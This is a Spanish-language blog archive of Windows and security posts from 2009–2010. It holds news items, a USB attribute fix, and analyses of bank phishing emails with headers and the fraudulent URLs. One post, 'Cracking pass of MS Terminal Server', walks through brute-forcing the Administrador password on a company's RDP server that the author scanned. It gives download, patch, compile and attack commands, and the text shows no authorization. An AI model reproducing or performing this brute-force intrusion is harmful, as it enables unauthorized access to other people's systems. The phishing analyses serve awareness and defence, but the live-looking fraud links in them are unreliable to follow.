Archive for the ‘Windows’ Category

Recuperando carpetas ocultas en un Pendrive

noviembre 16, 2010

Seguramente a muchos les ha traido mas de un dolor de cabeza aquellos ‘virus’ que infectan las memorias USB (pendrive) cuando lo usamos en alguna cabina internet , la oficina o la universidad.

Pues bien, se ha hecho regular que al descubrir que dichas carpetas están con atrubutos de oculto y sólo lectura, estas propiedades no se les puede cambiar desde el explorador de Windows, algunos recurren al winrar para visualizar sus archivos.

La solución es bastante rápida.

Abrir una consola de MS-DOS, ubicarte en la carpeta o directorio que contiene las carpetas que estan ocultas.

Escribir en la linea de comandos:

>attrib -h -s -r *.* /s /d

y listo todas las carpetas se habrán restablecido las carpetas.

donde:

-h para quitar el atributo de oculto
-s para quitar el atributo de archivo de sistema
-r para quitar el atributo de solo lectura

/s realiza la acción en los archivos contenidos en la carpeta actual y las subcarpetas.
/d realiza la accion en directorios o carpetas

ATTRIB Linea de comandos ms-dos

Anuncios

Cracking pass of MS Terminal Server

noviembre 10, 2010

Rdesktop for Terminal Server

Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.

Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.

Atacando al RDP MS Terminal Server usando Backtrack 4

1. Actualizamos y parchamos Rdesktop.

Descargamos:

Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz

RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff

Creamos una carpeta para las descargas

mkdir rdesk

A continuación, descomprimimos.

tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0

Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta

root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compilamos e instalamos

./configure
make
make install

Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque

2. Realizando el ataque

En la línea de comandos escribimos:

#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx

Interbank, Falso correo de Verificación Urgente de Datos

abril 25, 2010

Hace unos días descubrí en mi bandeja de correo un mensaje con los siguientes datos,

Asunto: Verificación Urgente de Datos por Motivos de Seguridad.‏
Desde: Banco Interbank (noreply@sonico.com)

Para empezar no tengo cuentas en dicho banco, en segundo lugar Interbank no tiene como dominio de correo electrónico @sonico.com y ahí la señal de que se trataba de un fraude.

El contenido de dicho correo es como sigue:

ESTIMADO CLIENTE :

La importancia por la seguridad e integridad de nuestros servicios hemos decidido enviarle el siguiente mensaje de alerta en el cual le comunicamos que debido a los reiterados robos informaticos, el banco a puesto a disposicion a todos sus clientes la nueva banca celular.

!Ingresa a su banca para acceder al sistema de banca celular! desde aki :

http://www.grrr.ws/escola/inscrits/css/NetActiva/www.interbank.com.pe/

 Creo que lo errores saltan a la vista, un banco formal no escribe ‘desde aki :’

Es así que decido investigar pero no tuve la suerte de ver el comportamiento o lo que dicho enlace hacía, al parecer ya lo han reportado y esta fuera de línea.


He aquí la cabecera del correo.

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0xO0Q9MTtTQ0w9MA==
X-Message-Status: n:0
X-SID-PRA: Banco Interbank noreply@sonico.com
X-AUTH-Result: NONE
X-Message-Info: R00BdL5giqqKCD/Wy0S2cY0xYtL/iwmX0lfiw24IiEeFn2
tAeTOaTUhcognDtSbAKP/RFfqyLVDrxxyomHSPN1ANmrNScx2A
Received: from moutng.kundenserver.de ([212.227.17.9]) by
BAY0-MC1-F35.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
         Mon, 12 Apr 2010 09:35:23 -0700
Received: from infong-es27.kundenserver.de
(infong-es27.1and1.es [212.227.114.95])
        by mrelayeu.kundenserver.de (node=mreu1) with ESMTP (Nemesis)
        id 0LnFph-1NZjtO0SwX-00hbRr; Mon, 12 Apr 2010 18:35:23 +0200
Received: from 186.160.53.202 (IP may be forged by CGI script)
    by infong-es27.kundenserver.de with HTTP
    id 4AgApW-1O1Mba3dD6-00078c; Mon, 12 Apr 2010 18:35:22 +0200
X-Sender-Info: 264167517@infong-es27.kundenserver.de
Date: Mon, 12 Apr 2010 18:35:22 +0200
Precedence: bulk
X-Apache-Env: www-ip="MTg2LjE2MC41My4yMDI=";helo="aW5mb25nLWVzMj
 cua3VuZGVuc2VydmVyLmRl";script="L2pzL3h6LnBocA=="
To: xxxxxx@hotmail.com
Subject: Verificación Urgente de Datos por Motivos de Seguridad.
From: Banco Interbank noreply@sonico.com
Message-Id: 1307462764.129@sonico.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-Provags-ID: V01U2FsdGVkX195DS7ibZzuMFH1v60nWbxywCtm7kaZyq7WoT2
 f64v457yiktsr/4kVE9Sb77sPM/gCQGRs1DhoFamksspmPZN6g
 0HGXj6/RbU=
Return-Path: noreply@sonico.com
X-OriginalArrivalTime: 12 Apr 2010 16:35:24.0171 (UTC)
FILETIME=[268805B0:01CADA5E] 

Un Segundo correo esta vez con los siguientes datos,

 De: Interbank.com.pe (Servicioalcliente@interbank.com.pe)
Asunto: Verificación Urgente de Datos por Motivos de Seguridad.‏

Contenido:

CUENTA SUSPENDIDA

Estimado Cliente:

Le hacemos llegar una notificación debido a que su cuenta Interbank ha sido Suspendia por que su correo electronico no esta registrado debidamente en nuestra banca por Internet.

El registro Activará automaticamente su cuenta!.

El enlace fraudulento es:
http://aditivos.com.sv/includes/fileman/includes/www.interbank.com.pe/index.shtml

He aquí la cabecera, 

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtTQ0w9Mg==
X-Message-Status: n:0
X-SID-PRA: Interbank.com.pe <Servicioalcliente@interbank.com.pe>
X-AUTH-Result: NONE
X-Message-Info: JGTYoYF78jEJRemogB0DrG8U7Uonnp59cA3w0GZq6yITpF7E
o3vl4gctGis75uynABblIcNI5LYgl7vHWUxrICWaBxQEFSub
Received: from quad.bahiaservers.com ([64.22.110.26]) by
SNT0-MC3-F37.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
         Thu, 1 Apr 2010 19:59:32 -0700
Received: from nobody by quad.bahiaservers.com with local (Exim 4.69)
        (envelope-from <nobody@quad.bahiaservers.com>)
        id 1NxX6X-0007aG-0H
        for xxxxxx@hotmail.com; Thu, 01 Apr 2010 23:59:29 -0300
To: xxxxxx@hotmail.com
Subject: Verificación Urgente de Datos por Motivos de Seguridad.
From: Interbank.com.pe <Servicioalcliente@interbank.com.pe>
Message-Id: <130746321.129@interbank.com.pe>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Date: Thu, 01 Apr 2010 23:59:29 -0300
X-AntiAbuse: This header was added to track abuse,
please include it with any abuse report
X-AntiAbuse: Primary Hostname - quad.bahiaservers.com
X-AntiAbuse: Original Domain - hotmail.com
X-AntiAbuse: Originator/Caller UID/GID - [99 32003] / [47 12]
X-AntiAbuse: Sender Address Domain - quad.bahiaservers.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: cadenaintegracion.com.ar:/public_html/images
Return-Path: nobody@quad.bahiaservers.com
X-OriginalArrivalTime: 02 Apr 2010 02:59:32.0788 (UTC)
FILETIME=[851A3F40:01CAD210]
 

Antivirus paralizó Windows

marzo 23, 2010

Una actualización defectuosa hizo que el antivirus BitDefender trasladara diversos archivos de Windows (64-bit) a cuarentena, debido a que la actualización considera que están infectados por el malware “Trojan.FakeAlert.5”.

El foro de usuarios de BitDefender estuvo durante el fin de semana colmado de indignados comentarios. Uno de los frustrados usuarios comenta que todo archivo que intenta ser ejecutado, incluyendo el explorador de Windows y las actualizaciones del propio BitDefender eran puestas en cuarentena.

BitDefender admite en su blog que el error resultó, en algunos sistemas, en que algunos programas dejaran de funcionar y que incluso Windows no pudiera ser iniciado.

La empresa reaccionó con rapidez y a las 07:00 hrs. del domingo 21 de marzo había publicado un parche reparador para la versión 2010 de BitDefender. El parche para la versión 2009 será publicada lo antes posible, informa la empresa.

Bitdefender ha publicado en su web 2 comunicados al respecto.

Problema con Actualización: Trojan.FakeAlert.5.
Carta abierta a los usuarios de BitDefender.

Extraido de: DiarioTI

Virus: de Alessandra Rampolla

octubre 30, 2009

Virus supuestamente enviado por Alexandra Rampolla

 Un archivo malicioso es enviado a través de correo electrónico y es identificado como un troyano/backdoor conocido como Poison.awri.1 

Supuesto Remitente: Alexandra Rampolla (info@hi5.com)

 Remitente real: El correo es enviado desde el dominio o servidor de correo core2.hostingmadeeasy.com, incluso han usado una cuenta (mccormac@core2.hostingmadeeasy.com) de esta empresa para realizar el envió masivo de estos correos falsos.

 Virus Alexandra Rampolla

El correo enviado es un correo falso que usa una imagen de la conocida sexóloga Alexandra Rampolla ofreciendo supuesto video con tips sexuales y escenas en vivo; la imagen está enlazada a la dirección:

 hxxp://www.sailing-holiday-mallorca.com/realty/include/class/video-exclusivo/Tips_Sexuales.php

 que al hacer clic invoca un supuesto archivo de video, que al verificar resulta ser un archivo ejecutable de 32 bits, Tips_Sexuales.AVI.exe que debido a que muchos usuarios en su configuración por defecto de Windows tienen oculto la extensión de los archivo, es así que fácilmente este archivo malicioso logra engañar al usuario haciéndose pasar como un video multimedia.

 El virus al ser ejecutado -involuntariamente por el usuario- crea el siguiente archivo A0028457.exe en la computadora victima.

 C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP109\A0028457.exe

 A los usuarios una vez mas se le recomienda tener cuidado con los correos con supuestas promociones o provenientes de usuarios o contactos desconocidos, sobretodo desconfíen de los correos que tengan como remitentes del dominio hi5.com o el remitente info@hi5.com

Ademas, hemos comprabado que el troyano es reconocido por muchos antivirus pero lamentablemente Nod32 antivirus que tiene hoy por hoy muchos usuarios no reconocer el troyano. Pueden ver el analisis del archivo desde Virustotal.es

Seguiremos analizando este archivo.

Google lanzará un competidor para Windows

julio 14, 2009

Según informes de prensa en E.U., la empresa presentará dentro de poco un sistema operativo que tendría la mayoría de sus funcionalidades alojadas en Internet y no el PC de sus usuarios.

En una clara movida contra Microsoft, Google anunció formalmente que se encuentra trabajando en la creación de un sistema operativo atado a su navegador Chrome y que, en principio, estaría enfocado a dispositivos de bajo costo, como los netbooks.

En su blog, Google señaló que el programa se llamaría Google Chrome Operating System y “se enfocará en ofrecer velocidad, simplicidad y seguridad. Será un sistema operativo liviano y eficiente que llevará a la gente a Internet en pocos segundos”, afirmó Sundar Pichai, vicepresidente de producto de Google.

Los voceros dijeron al diario The New York Times que la primera versión del sistema operativo estaría lista para finales de año. Se entregará bajo el mismo modelo de licenciamiento abierto de Linux, es decir, que comunidades de desarrollo externas a la empresa podrán tomar ‘la receta’ del programa, modificarla y mejorarla para compartir sus avances con el resto del mundo.

A mediados del año entrante, según el diario estadounidense, saldrán a la venta los primeros netbooks con este sistema de Google.

En la actualidad Windows, de Microsoft, está presente en el 90 por ciento de los computadores del mundo. En octubre 22 se lanzará la versión 7 de dicho sistema, que reemplazará a la actual Windows Vista.

Según Google, su navegador Chrome ya cuenta con más de 30 millones de usuarios. Las aplicaciones de oficina, entretenimiento, seguridad, etc. del nuevo sistema funcionarán ‘en la nube’, es decir, en Internet.

Mayor información del anuncio del sistema operativo de Google en el blog de la compañía (en inglés):

http://googleblog.blogspot.com/2009/07/introducing-google-chrome-os.html

Fuente: www.eltiempo.com

 

<!–

lalalalallaal

–>

Nueva vulnerabilidad ActiveX

julio 14, 2009

Microsoft está recomendando a sus usuarios que se deshagan de un viejo control ActiveX que ya no usa casi nadie y que es la base de un problema descubierto recientemente, afectando a Windows XP y Windows Server 2003.

La vulnerabilidad permitiría a un atacante tomar el control del PC de la víctima si consigue que esta navegue a un sitio web infectado con un fichero malicioso. Ni Windows Vista ni Windows Server 2008 están afectados por la vulnerabilidad.

Para eliminarla en el caso de que aún uséis Windows XP o Windows Server 2003, en Microsoft recomiendan utilizar un sistema para evitar que el control de vídeo ActiveX que crea el problema se active, que podremos activar directamente desde la página de soporte de Microsoft de modo que el sistema “Microsoft Fix It” repara el error automáticamente.

Solución y más Información:
http://support.microsoft.com/kb/972890

Fuente: www.theinquirer.es

Troyano en Excel

marzo 6, 2009

Se ha descubierto un nuevo tipo de troyano que aprovecha vulnerabilidades no corregidas en la popular aplicación de hojas de cálculo de Microsoft, y que de hecho afecta a varias de las versiones de esta herramienta.

El malware proviene de la creación de una hoja de cálculo maliciosa que contiene el troyano denominado BackDoor-DUE, identificado por la empresa de seguridad McAfee, y que afecta a las versiones de Excel 2000, 2002, 2003, 2007, 2004/2008 para Mac y Excel Viewer /2003.

Al abrir este tipo de ficheros el software malicioso crea una puerta trasera, y aunque en McAfee afirman que por el momento los ataques están muy limitados, se espera que Microsoft -que está investigando la vulnerabilidad- pronto publique un parche para corregir el error.

Fuente: www.theinquirer.es

Hotmail desde Outlook en un solo paso

febrero 24, 2009

Estuve leyendo en la red y hasta postee sobre la liberacion de los servicios POP3 de hotmail, live, msn y todos los correos de microsoft pero la verdad es que esta liberacion no es 100% efectiva pues solo un porcentaje de usuarios tiene acceso o goza de este servicio; me imagino que dicha liberación será de forma gradual tan igual cuando aumentaban de 2MB a 250MB las cuotas de correo.

En mi búsqueda por solucionarle el problema a un compañero – no muy amigo de las computadoras- encontré un pequeño programa (complemento) del propio Microsoft para Outlook, se llama “Outlook Connector” aplicacion que automáticamente sincroniza tu gestor de correos Outlook con tu correo web, en este caso hotmail.

Acabo de probar con Outlook 2003 y 2007 y funciona sin problemas, incluso hay una version en español. 

No hay que configurar nada sólo ingresas 3 datos: Nombres, direccion de correo-e y contraseña.

No soy usuario de Outlook, uso muy poco (o nada) hotmail pero creo que a más de un amigo le alegrará la mañana este programilla, sobretodo amigos de oficina que son fieles usuarios de outlook.

Un terrible virus amenaza el sistema Windows

enero 16, 2009

El virus conocido como Downadup se ha convertido en el peor de los últimos años, al afectar a más de 6,5 millones de ordenadores.

Un virus informático registrado esta semana y conocido como “Downadup” se ha convertido en el peor de los últimos años al afectar a más de 6,5 millones de ordenadores que operan en base al sistema Windows, informó hoy la compañía de seguridad en Internet F-Secure.

“La cantidad de infecciones de Downadup es impresionante”, comentó un investigador de F-Secure, Toni Koivunen. “De lo que se calculaba que serían 2,4 millones de máquinas infectadas pasó a afectar a más de 8,9 millones en los últimos cuatro días. Es increíble”, comentó el especialista.

Según la compañía Microsoft, el gusano informático estaría buscando un fichero ejecutable de Windows llamado “services.exe” para luego proceder a formar parte de ese código.

Según la firma de antivirus, el gusano informático utiliza un algoritmo para lograr cientos de nombres de dominios diferentes cada día, tales como mphtfrxs.net, imctaef.cc y hcweu.org., por lo que sería complicado rastrear ese sitio.

Por ahora, los expertos han logrado revertir este virus, prediciendo algunos de los posibles nombres de los dominios. Este proceso no ayudaría a averiguar quiénes son los responsables, pero al menos se obtendría la cantidad exacta de las máquinas afectadas.

Si los ordenadores tienen sus programas antivurs al día, no tienen qué temer.

Fuente: ElComercio.com.pe